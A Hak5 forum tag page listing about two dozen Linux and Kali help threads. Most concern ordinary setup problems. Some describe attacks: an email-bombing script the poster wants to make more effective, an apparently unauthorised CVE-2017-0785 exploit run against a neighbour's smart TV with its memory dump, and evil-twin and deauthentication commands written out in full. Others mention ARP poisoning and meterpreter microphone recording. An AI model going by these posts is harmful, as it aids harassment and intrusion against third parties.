Jump to content

Search the Community

Showing results for tags 'linux'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. I have a laptop that runs the latest version of Kali (as of 15/06/23 anyway) and with this being a laptop i need to save as much power as possible. I have in place bbswitch and bumblebee which turn off my nvidia gpu when not in use. This laptop has intel and nvidia gpu's I also use autocpu-freq and tlp to help with the power management. After all this i get about 3 or 3.5 hours of battery life. This is fine until i need to watch a small video, then my nvidia gpu starts and my battery level decrease dramatically. I use vlc but happens with some others i have tried. Does anyone know of a way or a media player that does not invoke my nvidia gpu, maybe a way to let my intel gpu take care of it instead Thanks
  2. Hi, I am having a very unusual problem with my Kali Linux install on my laptop. Everything works fine except for the audio recently, it has started to make loud crackling noises and such... Like the mic and speakers are too high or interfering with each other. But the problem persists even when I mute everything. This is a recent problem that started within the last week and I have no idea how to fix and I am reluctant to do another install because I tried a kali linux live USB and seemed to have the same problem. I narrowed this down to kali linux because I tried a live USB if Linux nate and appeared to have no issues at the time. Hope someone can help
  3. I am working on a Alpine Linux based OS, and bettercap is being used to communicate with raspbery Pi devices. Im taking in readings for WiFi signals and their Access Points, as well as GPS Coordinates. I wanted to ask how, if possible, to obtain readings of the gps.show commands to be outputted on to the my own AWS servers, or maybe just a log file that can be accessed and read (from there I could be extracted and outputted to wherever needed). I seen the event sessions go file and the wifi events being created, and noticed there was nothing for GPS, and was wondering if there was a way to input GPS Event sessions, so that gps coordiantes would be displayed there in intervals (via ticker). Any help would be greatly appreciated
  4. Im looking for some ideas on how to work on and practice using kali linux for the purpose of pen-testing and using all the various functions kali comes with. Things to bare in mind: I am fairly new to this, I have more then one computer, Im looking to aggressively expand my knowledge in this area, and of course i wanna be able to do this w/o breaking or damaging anything. Thoughts and suggestions, please and thank you!
  5. Kali linux has released a free downloadable pdf and a paperback book for around $20. I was wondering if anyone has used this and if it would be worth while.
  6. Hello, fellas security people, I would like to know the best way to authenticate offline software. We would like to sell our client our server software, but we want to ensure that this software would not be duplicated or used by non authorized users. We are thinking about usb authentication key, but I want to know how other people think about this problem.
  7. Hello community, Nice to be hear. I just wondered is their a more effective way of email bombing than I am currently doing? I have a simple home made python script which allows me to connect to a Google account I create ( Basic I know ) I am trying to work on over Email provider support. But anyway... I can't get past the " Text only input " is there a way to send files in email bomb attacks? Also how would this be done and is there a way to get past the terminal from cutting out due to the server closing the connection? is this due to the email service closing due to the volume of emails? if so is there a way I could logically delay the time between messages? Lastly all my emails come through to the same email. How can I get it to create a new email ( conversation ) each email? would it be a simple character var and change on each send? how would i implement this?
  8. I would like to know what are your thought on what distro to use for pen testing. Do you use Kali or build your own distro? I'm starting to learn so I use Kali
  9. So i was connected to the internet via eth0 and was trying to use ettercap and arp poisoning and then my router stopped giving internet if have tried to perform <echo 1 /proc/sys/net/ipv4/ip_forward> and also i have tried restarting my router multiple times and unfortunately there was no luck so how can i fix this problem
  10. So, I'm trying to configure an Open Vpn server to bridge two client connections together. The server is running on a Raspberry Pi 3, and one client, a "drop box" is on a Raspberry Pi 0. The second client is my Ubuntu laptop. Both Pis are running Raspbian Lite, so no GUI interface. I'm pretty comfortable with the command line, but I'm quite stuck here, and after researching for a while, I figured I'd ask for some help. I'm installing open vpn through the quick, vanilla install method. By which, I'm using `wget https://git.io/vpn -O openvpn.sh && bash openvpn.sh`. It gets the script from that address, and executes it, setting it up as a server. I got that far. Where I'm confused is the configuration for the server. The OpenVpn site says to use the GUI web interface, but I only have command line tools, to save on system resources. Every time I try to run `openvpn --config /etc/openvpn/client.ovpn` on my Pi Zero Client to connect to the VPN, I get the following error message: Sat Jan 27 21:00:14 2018 [server] Peer Connection Initiated with [AF_INET]192.168.1.41:1194 Sat Jan 27 21:00:16 2018 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1) Sat Jan 27 21:00:16 2018 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1 bypass-dhcp,dhcp-option DNS 192.168.1.1,route-gateway 10.8.0.1,topology subnet,ping 10,ping-restart 120,ifconfig 10.8.0.2 255.255.255.0' Sat Jan 27 21:00:16 2018 OPTIONS IMPORT: timers and/or timeouts modified Sat Jan 27 21:00:16 2018 OPTIONS IMPORT: --ifconfig/up options modified Sat Jan 27 21:00:16 2018 OPTIONS IMPORT: route options modified Sat Jan 27 21:00:16 2018 OPTIONS IMPORT: route-related options modified Sat Jan 27 21:00:16 2018 OPTIONS IMPORT: --ip-win32 and/or --dhcp-option options modified Sat Jan 27 21:00:16 2018 ROUTE_GATEWAY 192.168.1.1/255.255.255.0 IFACE=eth0 HWADDR=00:e0:4c:53:44:58 Sat Jan 27 21:00:16 2018 ERROR: Cannot ioctl TUNSETIFF tun: Operation not permitted (errno=1) Sat Jan 27 21:00:16 2018 Exiting due to fatal error To be clear, in case it wasn't already, I want to use the Pi Zero as a 'drop box' type of device. Its purpose is to be 'dropped' on a network, and tunnel out to the VPN Server. I tunnel into the VPN server using my laptop, and the packets sent from my laptop flow to the Pi Zero, letting me into the internal network the Pi is connected to. I'm trying to use the terminal only client because Darren said it's better, and I don't exactly have a lot of hardware to work with. The more resources I can save, the better. I'm only asking on here because the only resources I could find out there wanted the GUI, and I don't have one of those. Hak5 uses the install method I used in the second video I linked, but doesn't explain any of how it works, or how to configure it if you're not using a packet squirrel. I got the idea from a few Hak5 videos, which I will link below. Is there a configuration file I'm missing? If so, what do I have to change? This seems to be a pretty popular method of installing openvpn, so I'm rather surprised there isn't documentation for the command line only version. Thanks for reading all of this mess, and I appreciate any and all responses. Packet Squirrel Remote Access and OpenVPN Client Tunneling! - Hak5 2308 Access Internal Networks with Reverse VPN connections - Hak5 1921
  11. I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name) Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" Deauthorizing clients on another terminal aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Configuring nano /etc/dhcp/dhcpd.conf authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200; } Installing bridging utilities apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Bridging interface root@kali:~# brctl addbr evil \\Name of the bridge i made root@kali:~# brctl addif evil eth0 \\my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~# ifconfig at0 0.0.0.0 up root@kali:~# ifconfig evil up Starting DHCP server root@kali:~# systemctl start smbd.service root@kali:~# dhclient evil root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0 Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server. /etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service. IP gateway root@kali:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
  12. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?
  13. So I am picking up this bad boy today http://www.microcenter.com/product/474706/XPS_15_156_Gaming_Laptop_Computer_-_Silver and I am going to throw Ubuntu 16.04 on it. I am not interested in dual booting as I have been using Linux for years. However, now that Windows 10 doesn't come with physical CD keys anymore does anyone know a way to get the Windows 10 licence key extracted encase I want to throw windows back on it?
  14. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
  15. Did anyone of you get a working internet connection? I am trying to apt-get update, but it just continue to connect to httpredir.debian.com... root@bunny:/pentest/impacket/examples# apt-get update 0% [Connecting to httpredir.debian.org (140.211.166.202)] I think I need to update because every time I try to run rdp_check.py I get The error under: root@bunny:/pentest/impacket/examples# rdp_check.py CRITICAL:root:pyOpenSSL is not installed, can't continue
  16. I decided to put together a payload to get myself familiar with the bunny. This was inspired by SudoBackdoor and borrows heavily from it, but uses python because I'm more fluent in that than bash. I'm hoping to have this thing completed by the end of this week or possibly the weekend. The code under development is on my github at https://github.com/michael-weinstein/bashbunny-payloads/tree/darkCharlie/payloads/library/credentials/darkCharlie
  17. Hello, I just found out android phone sends requests to some Google domain i.e. http://clients1.google.com/ http://clients3.google.com/ http://connectivitycheck.gstatic.com http://connectivitycheck.android.com to check if they are connected to Internet or not. I need to redirect these domains requests made by android to my captive portal in Linux after they are connected to my wifi hosted by my PC. It doesn't matter whether they access internet after redirecting to my CP. I just need to configure my AP to redirect these requests to my CP in linux. How can I do it? I am using Kali Linux 2.0 Thank you
  18. Hi all, I have successfully run Kali from a persistent USB and SD card on a Chromebook in the past, however I unfortunately didn't take down how I did it. Silly me! I have enabled Developer Mode and run; crossystem dev_boot_usb=1 dev_boot_legacy=1 dev_boot_signed_only=0 sudo chromeos-firmwareupdate --mode=todev All completed without error. However, on loading my Chromebook and pressing CTRL+U, it fails to boot from USB or SD. I just get a low-frequency beep. On pressing CTRL+L, it also fails to read any SD or USB and I get 2 high-frequency beeps. I'm at a loose end, as searching around the net only yields the above. Anyone have any ideas? Cheers.
  19. Kali Linux Revealed book is now online. So back in 2013, there was this thread about kali documentation and a PDF e-book to go along - Which still holds true today. The docs.kali.org site is still up, and will be updated as changes happen. However, some of you may have heard, or not, so I wanted to update everyone, if you want to learn Kali Linux (not penetration testing, but the OS itself) more in depth, from customizing your own kernel and ISO deployments, to pre-loading drivers needed for installation on work machines and your own compatible/incompatible hardware to work as needed, deploy your own repositories with tools not already on the Kali repo, create attack appliances like the Evil Kali AP, then you will probably want to check out the Kali Linux Revealed book. Now, this might sound really spammy. And if I was only promoting the book to have you buy it, I would agree with you(I debated on whether I would ever post this here, but I know a lot of the hak5 community uses it alongside their other Hak5 tools and Pineapples) - but, we have taken the book, and converted it to a website, that we have given away FREE to the community. That is to say, the entire book is in web form, for free, search-able text, and we offer a PDF version for download from our new child site. Check out https://kali.training/ if you weren't already aware of it. I worked on converting the book from the HTML draft to create the wordpress version of the site which is linked above. A lot of man hours went into creating not only the book, but the site, and also material that was recently showcased at BlackHat for those who took the Kali Revealed class. It's an introduction to Kali and Linux, and a good primer for anyone who also might be thinking about the OSCP. Again, this is NOT a pentesting book, but if you do use Kali for learning pentesting and CTF's, this will still be a valuable resource for everyone. As Kali evolves and the Kali Team makes changes to the OS, the site will also update to reflect this over time, with new volumes released on the site as well. The book is also a mini-primer for Linux in general, so if you want to learn Linux and were always afraid to make Kali your first distro, this would be a great place to go and get your feet wet (I know a lot of people have always said don't start with Kali - personally I think that doesn't hold true today with it's Debian roots and would recommend it to anyone - my kids and wife use it as the family living room desktop, so it works fine for every range of user, n00b to l33t haxor...cough..). I'll admit, having worked on the site and reading only parts of it in full while converting it from the book the site, I myself am still a n00b when it comes to a lot of things Linux related in general, and while I use Kali for "fun" with CTF's, I am by no means fluent with it. I still have to sit down and read it in full myself, but I'm familiar with the topics in it and know that I need to brush up on a lot of the fundamentals. Just a reminder, this is not a Penetration Testing book. It's a Kali Linux OS book for sysadmins and InfoSec folks who need to deploy for their own use, or need to use and get familiar with, but it also is a complete walk-through from setup for new users, to more technical admin side towards the end of the book for anyone already in the field with a lead in for assessments.
  20. Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of; Using WLAN# up and WLAN# down Disabling USB ports using Hub-CTRL Using hardware add-ons This or this (unknown what is being done here) Even people saying it's not possible. What would you suggest? Has anyone else had any luck with switching off and back on an Alfa Wifi Card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.
  21. Just wanted to stir up conversation on what OS people got Started hacking on? Version number if you dont mind showing your age? and/or can remember. Slackware 2.6 i believe when i first got into it i mainly just liked to watch (no pun intended) and snoop around.
  22. Hi, so i louched an mdk3 after having created the blacklist file with echo and of course having placed the wlan0 in monitor mode (wlan0mon). However there is no output after: mdk3 wlan0mon d -b blacklist -c 1 I have to cancel eventually with control + c. Can somebody help? Thanks P.S using ALFA wireless card and injection works fine, tested with aireplay, also airodump, reaver etc. just MDK3 gives me issues.
  23. Hi all, I'm going to be doing the Red Hat System Admin I course soon, with the mind to follow up with the second course and then the RHCSA certification. Just wondered if anyone here had done these courses? Any tips / experiences / comments? Thank you
  24. Hi, I have a nexus 5 and I've installed Kali nethunter on there with no problems but I've tried to run commands such as apt-get update, apt-get install ect.. but it always says err 404 and the E: failed to fetch some archives maybe run apt-get update or try with --fix-missing? Can anyone please help explain how I can fix this, thanks
×
×
  • Create New...